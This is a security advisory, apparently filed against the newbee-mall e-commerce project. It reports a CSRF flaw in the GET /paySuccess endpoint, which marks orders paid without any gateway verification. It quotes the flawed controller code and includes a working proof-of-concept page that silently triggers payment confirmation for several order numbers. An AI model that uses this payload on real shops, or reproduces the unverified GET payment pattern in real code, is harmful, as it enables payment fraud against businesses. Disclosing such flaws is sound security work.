CSRF Vulnerability in Payment Processing

[flashzyc]

CSRF Vulnerability in Payment Processing

Summary

A CSRF vulnerability exists in the payment success confirmation endpoint /paySuccess. Attackers can mark orders as paid without actual payment, potentially leading to fraudulent order processing.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    public void addInterceptors(InterceptorRegistry registry) {
        // ❌ Payment endpoints have no CSRF protection
        // No interceptor configured for payment operations
    }
}

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/mall/OrderController.java (Lines 147-156)

@GetMapping("/paySuccess")
@ResponseBody
public Result paySuccess(@RequestParam("orderNo") String orderNo, @RequestParam("payType") int payType) {
    // ❌ CRITICAL: GET method for payment confirmation!
    // ❌ No CSRF token validation
    // ❌ No actual payment gateway verification
    // ⚠️ Trusts client-side payment confirmation
    String payResult = newBeeMallOrderService.paySuccess(orderNo, payType);
    if (ServiceResultEnum.SUCCESS.getResult().equals(payResult)) {
        return ResultGenerator.genSuccessResult();
    } else {
        return ResultGenerator.genFailResult(payResult);
    }
}

Critical Security Flaws:

1. ❌ Uses GET method for payment confirmation
2. ❌ No CSRF token validation
3. ❌ No server-side payment gateway verification
4. ⚠️ Can be triggered via simple link click

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Payment Processing</title>
</head>
<body>
    <h2>💳 Processing your payment...</h2>
    <p>Please do not close this window.</p>
    
    <!-- Invisible image triggers payment confirmation -->
    <img src="http://localhost:28089/paySuccess?orderNo=202602051645001&payType=1" 
         style="display:none;"
         onload="document.getElementById('msg').innerHTML='✅ Payment successful!'">
    
    <div id="msg"></div>
    
    <!-- Batch payment confirmation for multiple orders -->
    <script>
        var orders = [
            '202602051645001',
            '202602051645002',
            '202602051645003'
        ];
        
        orders.forEach(function(orderNo) {
            var img = new Image();
            img.src = 'http://localhost:28089/paySuccess?orderNo=' + orderNo + '&payType=1';
        });
    </script>
</body>
</html>

Impact

Fraudulent payment confirmation without actual payment - Attackers can mark orders as paid without completing payment, leading to unauthorized product delivery and financial loss for the business.

---

CVSS Score: 8.6 (High)